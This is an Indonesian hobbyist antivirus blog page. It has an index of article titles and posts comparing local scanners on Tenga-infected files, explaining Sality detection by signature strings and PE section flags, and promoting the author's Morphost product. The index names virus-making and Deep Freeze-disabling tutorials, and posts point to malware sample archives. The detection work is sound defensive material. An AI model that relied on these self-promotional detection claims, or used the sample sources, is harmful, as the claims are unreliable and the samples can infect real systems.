MorphostLab!

Thanks karena kamu sudah mengunjungi MorphostLab.
Berikut ini adalah artikel-artikel kami.

Sekarang MorphostLab sudah punya forum baru. Silakan bergabung bersama kami di forum MorphostLab
http://www.morphorum.co.nr

Kalian boleh mengcopy-paste seluruh artikel di bawah ini ke blog/atau web kalian tanpa mengubah isinya….

Virus Tenga berkeliaran di sekitar anda… 6 Februari 2010
Bagaimana Morphost mendeteksi Sality? (Rahasia Dibongkar!) 6 Februari 2010
OjanBlank Versus DosenBlagu (Database Morphost Februari 2010) 30 Januari 2010
Morphost Expert Dirilis!!! (Download Now) 25 Januari 2010
Morphost Expert siap deteksi virus Internasional! 25 Januari 2010
Source code terbaik ekstensi ganda 22 Januari 2010
Trik Scanning File Shortcut 18 Januari 2010
60% VirusAnalyst Lokal adalah pecundang 16 Januari 2010
Bagaimana kalau semua virus lokal bisa menembus smad-lock? 15 Januari 2010
Code Aktifkan Tools Windows Ala MorphostLab 13 Januari 2010
Selesaikan Worm Chasnah secara tuntas 13 Januari 2010
Source Code Deteksi Runonce!!! 13 Januari 2010
Test EICAR untuk Antivirus Lokal (2) 7 Januari 2010
Bunyikan Alarm Antivirusmu! 3 Januari 2010
Cara praktis dan baru matikan deepfreeze 27 desember 2009
Smad-Lock tidak lagi aman 27 Desember 2009
Virus Scandown;Virus Terkecil di MorphostLab 27 Desember 2009
Test EICAR Antivirus Lokal 2009 23 Desember 2009
Source Code Polymorphic untuk virus Macro 21 Desember 2009
Cewek Manis yang “Cuakep”! 19 Desember 2009
Menghapus Windows Genuine Advantage (WGA) 16 Desember 2009
Morphost Accords kompilasi 3 Semakin Baik Lagi!!! 15 Desember 2009
Analisis Worm Cinta F3 14 Desember 2009
Analisis Virus Bang Hasmi 27 November 2009
Amburadul doesn’t sleep 18 November 2009
Hellspawn is coming back! 7 November 2009
Analisis NadiaSaphira A dan NadiaSaphira B 5 November 2009
Amburadul Varian Baru atau Bukan? 5 November 2009
Analisis Virus Jim 29 Oktober 2009
Bisakah blackberry diserang virus? 22 Oktober 2009
Conficker lagi… 22 Oktober 2009
5 Fakta virus Conficker 22 Oktober 2009
Trik Sederhana AutoMacros untuk Virus Macro 20 Oktober 2009
Deteksi Dini Doomsday 2012 18 Oktober 2009
Ilmu Compress untuk Virus dan Antivirus 4 Oktober 2009
Kompilasi kedua Morphost Antivirus lebih baik 27 September 2009
Ilmu Encrypt untuk Newbie 25 September 2009
Virus Sabotage Pemblokir Antivirus Lokal 23 September 2009
Alphablend 22 September 2009
Morphost Dikompil ulang! 5 September 2009
Download Morphost Antivirus (Morphost Accords) 31 Agustus 2009
Morphost Antivirus Versi 6 diluncurkan! 31 Agustus 2009
Tiga langkah matikan deepfreeze 30 Agustus 2009
Tutorial Membuat Virus Vinorika Tiruan 23 Agustus 2009
Source Code Virus Vinorika 22 Agustus 2009
Checksum Icon Virus 6 Agustus 2009
Pencarian File Tercepat! 6 Agustus 2009
Teknik unkill virus Babon 4 Agustus 2009
Pemanfaatan “Send To” pada Virus dan AV 1 Agustus 2009
ActiveControl FolderTreeView dari Printer Canon 31 Juli 2009
Mempercepat eksekusi virus 28 Juli 2009
Kesilapan Programmer Newbie di Visual Basic 28 Juli 2009
Trik Ganti Caption Software orang lain 26 Juli 2009
Gudang Checksum. Saatnya AVmaker muda bangkit!!! 24 Juli 2009
Analisa Win32.Trojan-Gen by:SatryaCode 20 Juli 2009
Buat Shortcut? Alternatif menuju virus dan antivirus! 16 Juli 2009
Trik Cegah Segala Variant Conficker! 14 Juli 2009
Virus NadiaSaphira atau Virus BuluBebek? 13 Juli 2009
Apa yang aneh dari Doomsday 2012? 2 Juni 2009
Tutorial Virus Macro (2) 15 Mei 2009
Pemrograman Virus Batch untuk Pemula (2) 14 Mei 2009
Teknik DeepScan Morphost Accords 11 Mei 2009
Trik Icon-Phic ditemukan! Loloskan virus dari heuristik Icon Antivirus! 11 Mei 2009
Pemrograman Virus Batch untuk Pemula 8 Mei 2009
Analisis Sampel Virus BugAV 6 Mei 2009
Tuntaskan sality!!! 4 Mei 2009
Checksum Conficker 30 April 2009
Script Cabe Rawit yang bikin Jahil 29 April 2009
Worm Conficker Tertangkap!!! 27 April 2009
Rancangan Perencanaan Morphost Antivirus versi enam 26 April 2009
Matikan Process Deep Freeze 6 5 Maret 2009
Parameter Command Untuk Antivirus 26 Februari 2009
Bahas Tuntas X-Fly.Worm 21 Februari 2009
Code Untuk Mengetik Sendiri 14 Februari 2009
Camfrog. Virus Atau Bukan? 8 Februari 2009
Aku Benci Sality 18 Januari 2009
Teknik Scanning Tanpa Morphost 10 Januari 2009
Fitur Baru Morphost Green 5 Januari 2009
Morphost Green Siap Gempur Virus Lokal 3 Januari 2009
Encrypt Databasemu! 28 Desember 2008
Teknik FastScanning Morphost 6 Desember 2008
Teknik CatchFDVirus Morphost Ditemukan! 29 Nopember 2008
Hajar X-Fly.Worm dengan Morphost Antivirus 14 Nopember 2008
Analisa Maxtrox.Worm 11 Nopember 2008
Repair Your DocFile 2 Nopember 2008
Analisa Susanti.Worm 24 Oktober 2008
Teknik Mutasi Virus 14 Oktober 2008
Hadapi Virus Baru dengan Morphost Baru 5 Oktober 2008
Morphost Versi Revision Siap Launching 29 September 2008
Analisa Global.Worm 29 September 2008
Analisa Word.Worm Alias W32.Worm 16 September 2008
Tutorial Membuat Virus Macro 11 September 2008
Tidak Bisa Menginstall karena Virus? 3 September 2008
Analisa Rieysha-Local.Worm 28 Agustus 2008
Analisa Amburadul.Worm 8 Agustus 2008
Analisa Rieysha-Desa.Worm 23 Agustus 2008
Analisa Nita.Worm 6 Agustus 2008
Morphost AV 2 August 2008 Version is coming 3 Agustus 2008
About Morphost Antivirus Versi 2 Agustus 2008 23 Juni 2008
Habisi Aksika 20 Juni 2008
Tutorial Encrypted VBS 18 Juni 2008
Download Morphost New Generation Antivirus 7 Mei 2008
Hajar Coolface Pake Morphost 7 Mei 2008
Morphost si Antivirus Baru Indonesia 1 April 2008

Artikel MorphostLab lainnya yang tidak terikat:
Daftar Blog/Web Anggota MorphostLab 14 Desember 2009
Tugas MorphostLab akhir tahun 2009
Forum MorphostLab!!! 27 November 2009
Anggota baru MorphostLab (up to 13 Nov 2009) 16 November 2009
Dibutuhkan anggota baru MorphostLab 31 Oktober 2009
Manfaat Terinfeksi Alman 25 Oktober 2009

Virus Tenga berkeliaran di sekitar anda…

Lindungi Komputer Anda dari virus Tenga!

Baru-baru ini dilaporkan bahwa penyebaran virus Tenga semakin merebak di Indonesia. Dan yang perlu anda tahu adalah Tenga ini adalah jenis malware yang bisa menginfeksi file! Ingat itu!
Jadi yang anda butuhkan adalah scanner yang benar-benar didukung engine pendeteksian virus. Saya bukan bermaksud untuk mempromosikan Morphost, antivirus saya. Tetapi memang inilah kenyataannya.
Segera lindungi komputer anda!

Nah, saya siapkan 25 file terinfeksi Tenga untuk discan oleh antivirus loka.
Kita akan coba beberapa antivirus lokal untuk mendeteksi virus Tenga ini!

-Ansav
-AVS-32
-CMC Ph2
-Limav
-Mankbut AV
-Morphost Expert
-PCMAV
-Smadav Rev8
-Revi AV (RAV)
-ReshAV ver3
-Virspector v1.1

Berikut ini adalah hasil pendeteksiannya. Diurutkan berdasarkan jumlah file yang terdeteksi.
1.Morphost (25 virus terdeteksi dan akurasi 100%)
2.CMC PH2 (25 virus terdeteksi dan akurasi 100%)
3.PCMAV (12 virus terdeteksi dan akurasi 48%)
4.ANSAV (5 virus terdeteksi dan akurasi 20%)
5.Smadav (0 virus terdeteksi dan akurasi 0%)
6.Mankbut (0 virus terdeteksi dan akurasi 0%)
7.Revi AV (0 virus terdeteksi dan akurasi 0%)
8.Limav (0 virus terdeteksi dan akurasi 0%)
9.Virspector (0 virus terdeteksi dan akurasi 0%)
10.ReshAV (0 virus terdeteksi dan akurasi 0%)
11.AVS-32 (0 virus terdeteksi dan akurasi 0%)

Berikut adalah gambar yang dicaptured saat pendeteksian virus Tenga ini. Saya mohon maaf karena gambar-gambar yang saya ambil hanya antivirus yang mendeteksi Tenga ini saja.

Pcmav deteksi 12 dari 25 virus

Ansav mendetek 5 dari 25 virus.

CMC mendeteksi 25 dari 25 virus.

Morphost Deteksi 25 dari 25 virus.

Pesan terakhir saya adalah, lindungi komputer anda. Anda bisa pakai salah satu dari keempat antivirus yang mampu mendeteksi Tenga. Keempat antivirus ini siap menjaga komputer anda!

Sekian,
by: Morphic Karta

Bagaimana cara Morphost mendeteksi Sality? (Rahasia Dibongkar!)

Bagaimana cara Morphost Antivirus mendeteksi sality?

Banyak orang bertanya-tanya, sebenarnya apa sih string yang cocok untuk deteksi file infeksi sality?
Wajar, banyak AV lokal yang mendeteksi virus hanya dengan cek string saja dan melupakan pendeteksian dengan PE.

Ada dua caranya memang untuk deteksi file infeksi sality. Cara pertama dengan string cara kedua dengan PE Header.

Nah untuk cara pertama kamu harus tahu dulu string apa yang cocok ya? Sebenarnya banyak string-nya. Gak hanya satu untuk deteksi satu full varian.

Sebagai bonus untuk membaca artikel ini saya bocorkan satu string untuk Sality varian AA (menurut Morphost dan menurut nama internasionalnya).
String itu adalah “Ü/6!”
Hati-hati! String itu string Ucase loh!
Kamu juga boleh pake “/6!” tanpa huruf “Ü”, kalo kamu pake 3 huruf ini maka lebih banyak file infeksi yang terdetek loh. Bener! tapi saya pernah ngalamin falsedetek satu kali…
Tapi kalo kamu pake ” Ü/6!” (pake huruf “Ü”, file infeksi sality yang terdetek hanya sedikit)

Tapi jangan salah loh, ada juga file infeksi sality-AA lainnya yang lolos deteksi string ini. Untuk itu kamu harus cari string lainnya.. Anggap string ini hanya bonus.

Lalu selain sality-AA, ada juga varian sality lain yang cukup membandel di Indonesia. Yaitu sality-AE. Ini varian terbaru dan masuk 20 besar malware kasus terbanyak di dunia.

Untuk Sality-AE ini kamu bisa pakai string “QÏËXR”. Yang ini juga, anggap saja bonus. Untuk string lainnya cari sendiri.

Lalu kita masuk ke cara kedua yaitu dengan PE Header.
Kamu bisa pakai tools apa saja deh. Cari aja di google source code untuk melihat PE Header suatu file. Banyak kok.
Nah, sebagai tutorial saya ambil contoh PE Header yang dibuat oleh Kira Yamato. Kamu bisa pakai source lainnya (gak harus source Kira Yamato kok).

Untuk deteksi sality kita hanya perlu melihat sectionnya saja.
Gambar di atas adalah hasil PE Header dari satu file. File yang bukan terinfeksi.
SEctionnya seperti berikut.
.text
.data
.rsrc

Ada tiga section disitu!
Sekarang kamu coba browse lalu cari file bersih lainnya!
Saya coba untuk mencari file lain dan hasilnya seperti berikut.
.text
.rdata
.reloc

Ingat nama-nama section bisa saja berbeda dan jumlah section pun bisa aja berbeda. Kadang ada hanya satu atau kadang ada file yang punya 10 section.

Baiklah, sebelum kita periksa file yang terinfeksi Sality, kita coba cari satu file normal lain. Dan hasil file yang saya browse adalah sebagai berikut.
.text
.rdata
.data
.rsrc

Oke. Coba browse salah satu file infeksi sality yang kamu punya! File yang saya punya hasilnya sbg berikut.
File Pertama Hasilnya:
UPX0
UPX1
.rsrc
.0UPX1

Ok. Sabar dulu! Kita coba cek file-file infeksi sality yang lain. Saya punya banyak soalnya. Kita coba cek 3 file virus lagi ya…
File yang Kedua hasilnya:
.text
.rdata
.data
.rsrc
.irdat

File yang Ketiga hasilnya:
UPX0
UPX1
.rsrc
.EUPX1

File yang Keempat hasilnya:
.text
.rdata
.data
.rsrc
.drdat

Sabar. Mungkin kamu bingung… Apa-apaain ini semua. Tenang. Nyantei aja dulu…

Begini,
Tadi di atas, kita sudah cek empat file infeksi sality. Yang perlu ditekankan disini adalah keempat file yang terakhir kita cek adalah file infeksi virus!
Kita coba cek file pertama dulu y.

Sebenarnya, File pertama kita di atas sebelum diinfeksi, sectionnya sebagai berikut:
UPX0
UPX1
.rsrc

Tapi setelah diinfeksi ternyata ada tuh, satu section muncul. SECTION PALING AKHIR!!!
Muncul section
.0UPX1

Logikanya mudah saja….
JIKA SECTION TERAKHIR MIRIP DENGAN SECTION NOMOR DUA, MAKA KEMUNGKINAN BESAR 75% FILE TERSEBUT TERINFEKSI VIRUS!

Coba analisis file pertama ini! Bandingkan Section terakhir dengan Section kedua
.0UPX1 (section terakhir) bandingkan dengan UPX1 (section nomor 2).
Mirip!!!

Oke, mungkin kamu masih bingung, coba kita analisis file Kedua yang hasilnya sbg berikut:
.text
.rdata
.data
.rsrc
.irdat

Bandingkan setion terakhir dengan section nomor 2.
.irdat (section terakhir) dengan .rdata (section nomor dua).

CATATAN:
Nama section tidak bisa lebih dari enam karakter! Itu sebabnya section terakhir file Kedua bukan “.irdata” melainkan “.irdat”

Bagaimana? Sampai disini sudah mengerti?
Oke, kita analisa lagi deh file Ketiga!

Hasil sectionnya sebagai berikut:
UPX0
UPX1
.rsrc
.EUPX1

Bandingkan section terakhir dengan section nomor dua.
Section terakhir (.EUPX1) mirip dengan section nomor 2 (UPX1)
Jawabannya: file ini 75% kemungkinan terinfeksi Sality!!!

Lalu 25% lagi?
Oke, sabar. Kita analisis dulu file Keempat ya!
Daftar sectionnya sbg berikut:
.text
.rdata
.data
.rsrc
.drdat

Silakan bandingkan.
Tentunya section terakhir (.drdat) mirip dengan section nomor 2 (.rdata)

Kuncinya begini!!!
Kalau section nomor dua adalah:
.data
Maka section terakhir pasti:
.*data
(tanda bintang “*” menandakan karakter bebas)
Misal: (.adata, .bdata, .xdata, .odata dan lain-lain)

Kalau section nomor dua adalah
.rdata
Maka section terakhir pasti:
.*rdat
(tanda bintang “*” menandakan karakter bebas. Ingat aturan tadi! Nama section tidak lebih dari 6 karakter)
Misal: (.irdata, .ordata, .srdata dan lain-lain)

Saya harap kamu mengerti.

Oke. Pertanyaannya sekarang, bagaimana menentukan 25% lagi? Dari tadi Cuma 75% terus..
Yap, 25% lagi untuk menentukan file yang kita cek apakah benar-benar terinfeksi sality.

Coba browse lagi salah satu file infeksi sality!

Analisis section terakhir lalu periksa Flags Section terakhir!
Kalau nilainya “E0000020” maka file tersebut 100% terinfeksi virus Sality!!!!

Trik ini sudah diterapkan di Morphost Antivirus. Dan saya menduga bahwa metode ini jugalah yang dipakai oleh antivirus-antivirus luar/asing (yang biasa kamu pakai itu).

Antivirus lokal sendiri masih banyak yang masih pakai teknik checksum. Memang teknik checksum tidaklah salah. Tapi sangatlah fatal kalo checksum file terinfeksi yang dimasukkan ke dalam database antivirus.
Ya kan? Setiap file terinfeksi virus pasti punya checksum yang berbeda tentunya.

Antivirus lokal yang pakai teknik ini pun masih sangatlah sedikit. Jadi tidak ada salahnya kalau kamu pakai Morphost Antivirus untuk melindungi komputer anda. He hehehee.

Smad*v, salah satu antivirus lokal yang berslogan “antivirus kebanggaan Indonesia” belum pakai teknik ini.
Jadi kalau kamu sudah bisa terapkan teknik ini pada antivirusmu, maka antivirusmu sudah selangkah lebih maju dibanding Smad*v.

Mudah-mudahan ilmu yang saya sampaikan ini berguna untukmu. Dan kembangkanlah. Karena dengan teknik-teknik semacam ini pula, Morphost mampu mendeteksi virus-virus internasional lainnya seperti Alman, Sohanad, Tenga atau Gaelicum, Parite, Pharaoh, Runonce atau chirB, Virut, Autoit.Var, Recycler.Var (next revision), dan Small (next revision). Saya rasa saat ini Morphost menjadi antivirus di Indonesia yang mendeteksi lebih banyak file infeksi virus internasional!
Dan mungkin Morphost akan mendeteksi kasus infeksi lebih banyak lagi di revisi berikutnya.

Jangan lupa, cantumkan nama “Morphic Karta” dan “Morphost” di your “About Me” yaaa….
Karena saya anggap itu sebagai tanda terima kasih dan saya juga akan doakan supaya Tuhan tetap membantu kalian untuk mengembangkan teknik ini.

Sekian,

By: Morphic Karta
Thanks to:
-semua anak-anak FK USU 2009
-semua pengunjung setia Morphostlab.

Add facebook saya: Morphic Karta
Dan Join di group: MorphostLab

OjanBlank Versus DosenBlagu (Database Morphost Februari 2010)

OjanBlank Versus DosenBlagu! (Database Morphost Februari 2010)

Dari segi ukuran, cara menyerang, maupun pertahanan, OjanBlank dan DosenBlagu merupakan dua virus yang sangat berbeda. Kemungkinan bahwa pembuatnya adalah sama sangat lah kecil bahkan tidak mungkin.

Tapi ada yang menyamakan keduanya! Keduanya mempunyai Company yang sama yaitu “52 KB”
Saya punya 3 sampel di lab saya, yang mempunyai company yang seperti itu, dan tadinya saya namai “Item52KB.” Tapi akhirnya saya sudah dapatkan namanya yang tepat.

Saya sudah coba beberapa AV lokal untuk menscan ketiga file tersebut. Ada antivirus yang mampu mendetek dua dari tiga worm, ada yang hanya satu dan kebanyakan tidak mendetek satu worm pun.

Morphost sudah bisa detek ketiga sampel-nya. Dan saya yakin diluar sana banyak juga sampel yang mirip dengan ketiga worm ini.

Nah, perhatikan gambar di bawah ini.

Penyebaran worm ini ke:
-C:\windows\system32\b.doc
-C:\windows\system32\junx.exe
-C:\windows\system32\ijl11.dll
-C:\windows\system32\ms.exe
-C:\windows\system32\WinGui.exe

Sayang sekali, saat worm ini dianalisis, terjadi error saat pertama kali eksekusi, jadi hasil analisis-nya tidak bisa didapatkan secara sempurna.

Sementara penyebaran worm DosenBlagu sebagai berikut:
-C:\Windows\system32\normal.dot
-C:\windows\system32\export\services.exe
-C:\windows\aaa.exe
-C:\windows\bbb.exe

Hasil analisis kedua virus ini masih belum lengkap, selebihnya anda bisa analisis sendiri.

Jangan lupa untuk download database Morphost Februari 2010. Dengan database ini pula worm-worm di atas bisa dideteksi dengan sempurna. (meskipun dengan database Morphost Januari 2010, beberapa tipe worm bisa terdeteksi)

Malware (Virus+worm+Trojan) yang ditambahkan pada database Februari 2010 ini antar alain:
Aksika-I
Autoit-H
BugAV1
BugAV2
Conficker.Var[1]
Conficker.Var[2]
Conficker.Var[3]
Conficker.Var[4]
Conficker.Var[5]
EsTeh
EsTeh-Compnt[A]
EsTeh-Compnt[B]
EsTeh-Compnt[C]
EsTeh-Compnt[D]
EsTeh-Compnt[E]
IndoSex.Dropper
Inet-Dropper
Iraqilion.Troj
OjanBlank
OjanBlank-Compnt[1]
OjanBlank-Compnt[2]
Recycler.Var[1]
Recycler.Var[2]
Sality-E
Svcnost.Dropper
Svcnost.Troj
Valentine

Lalu kita punya HiddenSignature di Morphost Expert. (Dulu saya lupa untuk mengatakan ini).
Morphost punya HiddenSignature, yaitu pendeteksian untuk varian-varian virus dan ini sangat ampuh.
HiddenSignature di Database Morphost Februari 2010 ini antara lain:
-Serviks.Var
-DosenBlagu.Var

(Kedua worm ini akan terdeteksi mulai dari Variant A sampai Variant Z)

Silakan download.
Download Database Morphost Februari 2010

Akhir kata, kami mengharapkan agar user-user Morphost ataupun pengunjung-pengunjung MorphostLab mau untuk membantu kami dalam pengembangan database Morphost edisi Maret 2010 nanti.
Tetap upload virus ke morphic.4shared.com!

Sekian,
By: Morphic Karta

Morphost Expert Dirilis!!! (Download Now)

Morphost Expert Dirilis!!!

Akhirnya setelah lama menyusun code-nya morphost Expert pun dirilis. Tentunya dengan kelebihan dan kekurangannya…

Morphost Expert ini sengaja dibuat untuk bekerja sama dengan antivirus-antivirus lokal lain dalam memberantas virus-virus lokal maupun virus-virus asing yang membandel di Indonesia. Saling melengkapi dan menutupi kekurangan sesama antivirus lokal juga menjadi prinsip MorphostLab.

Morphost Antivirus sudah beredar dan menyebar ke seluruh Indonesia sejak tahun 2007, dan mulai menunjukkan penyebaran yang sangat signifikan pada awal tahun 2009. Perbedaan antara Morphost versi satu dan versi tujuh ini sangatlah kontras sehingga mau tidak mau Morphost versi-versi lama pun harus digeser posisinya dengan Morphost Expert ini.

[Metode Scanning]
Metode scanning yang digunakan pada Morphost Expert sangat jauh berbeda bila dibandingkan dengan versi-versi terdahulu. Metode kali ini jauh lebih tepat sasaran.
Scanning dimulai dengan menentukan jenis file yang akan diperiksa, apakah file aplikasi atau file teks/script. Morphost Expert tidak lagi menggunakan cara konvensional seperti cek ekstensi file (ekstensi exe, com, bat, scr, cmd disebut aplikasi, lain dari itu file script), maupun cek dua string awal tubuh file yang sering digunakan oleh antivirus lokal lainnya (bila string = “MZ” maka file aplikasi, lain dari itu file aplikasi).
Kini Morphost Expert melakukan pengecekan rutin image PE yang valid setiap filenya. Cara ini sangatlah ampuh dan tidak bisa ditipu. Dan trik ini biasanya digunakan oleh antivirus-antivirus luar (meski tidak semuanya).
Berikutnya file aplikasi akan menjalani 5 level scanning sedangkan file script/teks akan menjalani 2 level scanning.

[Pendeteksian Morphost Experti pada file Aplikasi]
Setiap file aplikasi yang discan Morphost harus melewati 5 level scanning. Kelima level tersebut antara lain:
1. BasicSignature
2. BasicHeuristic
3. MediumHeuristic
4. AdvancedHeuristic
5. AdvancedSignature
Tidak ada maksud tertentu membuat nama-nama level tersebut. Awalnya saya pun sempat bingung untuk menamai level-level ini. Tapi mau tidak mau, setiap levelnya harus diberi nama.
Penjelasan tiap levelnya akan dijelaskan lebih rinci berikut ini:

-BasicSignature-
Pada level ini, tiap file akan dikalkulasi untuk didapatkan checksumnya. Morphost veri Expert tidak lagi menggunakan checksum-checksum lama seperti crc32 maupun md5. Kini Morphost Expert menggunakan checksum sendiri dengan mengkalkulasi string file secara langsung. Beberapa byte didalam file akan diambil lalu dikalkulasikan. Hasil kalkulasi akan dicocokkan dengan checksum-checksum malware yang ada di database Morphost. Bila checksumnya sama file tersebut tersebut dianggap sebagai malware.

-BasicHeuristic-
Istilah heuristik lumayan sering digunakan oleh antivirus yang artinya metode mendapatkan virus baru (menurut antivirus).
BasicHeuristic Morphost tidak jauh beda dengan heuristik yang sedang populer di kalangan antivirus lokal, yaitu Icon Compare atau Perbandingan Icon.

Logikanya, Morphost akan melihat icon tiap file aplikasi. Apabila icon yang digunakan sama seperti icon yang dipakai malware umumnya, file tersebut dianggap sebagai malware.
Biasanya icon yang digunakan seperti icon folder, music, document word dan lain-lain. Tentunya anda bingung dong, kalau ada file aplikasi bericon folder?

-MediumHeuristic-
Sasaran dari level scanning ini adalah varian-varian virus-virus lokal. Dengan level ini, varian-varian baru bisa dideteksi dengan mudah. Misalnya begini, anggap virus Brontok varian A sedang menyebar sekarang. Nah, kebetulan Morphost punya Brontok varian A (mungkin setelah dikirim oleh user Morphost). Setelah memiliki Brontok varian A, Morphost menganalisa dan mengolah malware tersebut sehingga dibuatlah satu signature khusus untuk Brontok varian A. Dengan signature inilah Brontok varian B sampai Z bisa terdeteksi.
Selain itu, sasaran lain level tiga ini adalah malware-malware yang dibuat dalam bahasa Visual Basic. Tentunya bahasa pemrograman yang paling sering digunakan oleh VirusMaker lokal adalah VisualBasic
Biasanya virus-virus lokal baru akan terdeteksi dengan level tiga ini.

-AdvancedHeuristic-
Teknik heuristik ini yang paling saya suka. Karena heuristik ini sangatlah bagus. Metode scanning level empat ini dikhususkan untuk mendeteksi file-file anda yang terinfeksi oleh virus.
Virus-virus yang bisa dideteksi antara lain Alman-A, Alman-B, Sality.Variant (hampir semua variant) atau virus turunannya seperti Tanatos dan lainnya, Runonce atau ChirB, Pharaoh atau Mabezat, Virut.Variant (hampir semua variant) dan Tenga atau Gaelicum.

Sasaran AdvancedHeuristic atau metode scanning level empat adalah untuk mendeteksi virus-virus di atas. Namun sering juga terdeteksi virus-virus seperti Bacalid, beberapa trojan, Parite dan lainnya.

Sejauh ini masih belum banyak antivirus lokal yang mampu mendeteksi virus-virus internasional. Jadi tidak ada salahnya anda gunakan Morphost Antivirus untuk melindungi komputer anda?

-AdvancedSignature-
Disini adalah level scanning tercepat karena sama sekali tidak ada kalkulasi file pada level ini. Di AdvancedSignature ini terjadi beberapa tahap. Tahap pertama adalah untuk tahap FakeName (untuk mendeteksi virus-virus yang suka menyamar sebagai file-file system), tahap kedua yaitu pendeteksian terhadap tipuan seperti double extensi (ekstensi ganda).
Morphost memiliki trik untuk mendeteksi bermacam-macam ekstensi ganda. Pendeteksiannya dilakukan dengan sangat baik. Jika anda tidak percaya anda bisa kunjungi blog MorphostLab (http://www.morphostlab.co.nr) untuk membuktikannya. Di sana sudah diposting satu artikel yang mengulas tentang pendeteksian double extension oleh Morphost.
Sejauh ini, saya kira belum ada antivirus lokal yang melakukan pendeteksian double extension sebaik Morphost. (CMIIW=Correct me if I wrong).

Plus lainnya adalah:
-Kecepatan scanning Morphost yang dua-tiga kali lebih cepat dari Morphost yang lama.
-ditambahkan indikator kecepatan file
-adanya indikator waktu. Jadi kita bisa tahu berapa menit lagi selesai…

Download Morphost Expert

sekian,
by: Morphic
thanks to:
-satryacode
-yudha

Morphost Expert Siap Deteksi Virus Internasional

Masih banyak antivirus lokal yang belum bisa mendeteksi file-file infeksi virus internasional. Dan memang inilah yang menjadi masalah. User sendiri tidak menyadari dan tidak bisa membedakan file-filenya yang sudah terinfeksi virus dan mana yang tidak.

[Morphost Deteksi Sality Variant]
Morphost Expert kini sudah bisa mendeteksi file-file yang terinfeksi varian-varian Sality. Sejauh ini hampir semua varian bisa dideteksi karena tipe infeksi yang dilakukan Sality hampir sama di setiap variannya. MorphostLab sudah siapkan engine untuk mendeteksi Sality sekaligus virus-virus seperti Tanatos dan virus-virus yang tipe infeksinya sama dengan Sality. Sasaran engine ini sebenarnya hanya untuk Sality tapi bisa juga mendeteksi virus lainnya karena tipe infeksinya hampir sama.

[Morphost Deteksi Alman Variant A dan Variant B]
Virus Alman cukup tinggi penyebarannya di Indonesia dan sampai saat ini belum punah juga. Morphost sudah bisa mendeteksi file infeksi Alman A dan B. Kedua sampel ini sangat sering saya jumpai di warnet-warnet bahkan di 4shared MorphostLab juga banyak. Saat merakit engine pendeteksian Alman, saya juga sempat mendownload Alman varian A dan B dari http://vx.netlux.org (banyak koleksi virus di sana). Dan keduanya terdetek oleh Morphost sekaligus semua file-file yang memang sudah terinfeksi.

[Morphost Deteksi Virut]
Saya mendownload beberapa varian virut dari http://vx.netlux.org untuk dijadikan bahan analisis. Dan engine untuk pendeteksian virut juga sudah dibuatkan untuk Morphost. Awalnya saya membuat satu engine untuk virus Tenga (atau bisa disebut Gaelicum), ternyata engine ini juga bisa mendeteksi Virut. Setelah saya cek ternyata tipe infeksi Virut dan Tenga hampir mirip tapi meskipun begitu keduanya juga punya cara infeksi yang berbeda. Hampir semua varian Virut bisa dideteksi

[Morphost Deteksi Pharaoh atau Mabezat]
Antivirus asing menyebut virus ini Mabezat, dan saya juga sempat bingung menamai virus ini. Tapi karena virus ini hanya menampilkan nama “Pharaoh” jadi saya sebut saja virus ini “Pharaoh”. Antivirus lokal lain juga ada yang menyebutnya Pharaoh. Sayangnya antivirus lokal lain hanya bisa mendeteksi induknya saja. Belum lagi si Pharaoh juga bisa punya trik mutasi yang sangat baik, sehingga untuk mendeteksinya pun perlu heuristik Icon Compare.
Salah satu kelebihan Morphost adalah kemampuan Morphost untuk mendeteksi file-file infeksi Pharaoh.
Penyebaran virus ini sebenarnya masih baru dimulai, dan tampaknya penyebaran virus ini semakin luas. Jadi untuk melindungi komputer anda, silakan gunakan Morphost.

[Morphost Deteksi Tenga atau Gaelicum]
http://vx.netlux.org punya dua varian Tenga, dan keduanya bisa dideteksi oleh Morphost hanya dengan satu engine. Bayangkan, dengan satu trik dua varian Tenga bisa terdeteksi. Dari semua antivirus lokal yang ada, hanya ada satu yang temukan yang mampu mendeteksi Tenga ini. Sayangnya tidak 100% akurasinya. Mengapa? Karena antivirus tersebut melewatkan beberapa file infeksi lainnya yang sebenarnya memang terinfeksi. Keuntungan lainnya, engine khusus Tenga ini terkadang bisa mendeteksi sebagian kecil varian Virut, dan juga virus Bacalid. Tapi saya belum bisa pastikan kalau engine Tenga ini bisa mendeteksi Bacalid. Ataukah sampel Bacalid yang saya punya sudah diinfeksi Tenga?

[Morphost Deteksi Runonce Atau ChirB]
Virus yang satu ini cukup terkenal belakangan ini, dan ini sebenarnya virus lama tapi sampai sekarang masih terkenal. MorphostLab menyebut virus ini Runonce, dan virus ini benar-benar mengganggu di lab kami, karena sudah mencemari dan menginfeksi sampel-sampel virus yang kami punya. Nama lain virus ini adalah ChirB.
Morphost Antivirus mampu mendeteksi virus ini dengan sangat baik. Namun ada hal lain yang perlu diperhatikan dari virus ini. Virus Runonce ini mendrop file-file email dengan jumlah yang banyak sekali sekaligus menginfeksi banyak file internet. Untuk file internet yang diinfeksi biasa disebut Nimda oleh antivirus internasional.
Kini Morphost sudah bisa mendeteksi file infeksi Runonce ini sekaligus file-file email yang didrop dan file-file htm, html maupun asp yang diinfeksi Runonce (biasa disebut virus Nimda).
Sejauh ini masih belum ada antivirus lokal lain yang mendeteksi semuanya itu. Memang ada yang bisa mendeteksi file infeksinya namun file email dan file internet tidak dideteksi. Jadi, sekali lagi, tidak ada salahnya untuk menggunakan Morphost memproteksi komputer anda.

[Morphost Deteksi Sohanad]
Sebenarnya kalau saya ditanya, Sohanad ini mirip dengan Autoit (ini pendapat saya). Mengapa? Entahlah, mungkin ini Cuma perasaan saja. Trik untuk mendeteksi sohanad tidak begitu sulit saya rasa, karena saya mendapatkan triknya secara tiba-tiba (terlintas di benak begitu saja). Sohanad adalah virus yang cukup banyak kasus infeksinya di Indonesia. Tahun 2008 Sohanad berada di peringkat nomor 4 yang paling banyak insiden infeksinya di tanah airnya. Dan saya rasa anda pun perlu waspada, karena sampai saat ini saya masih menemukan sampel-sampel Sohanad yang dikirim kepada saya.

[Morphost Deteksi Parite]
Kalau yang ini kasus infeksinya tidak begitu banyak dibanding Sality atau alman. Namun saya sering mendapati virus-virus semacam ini di cd-cd bajakan. Entah kenapa begitu…
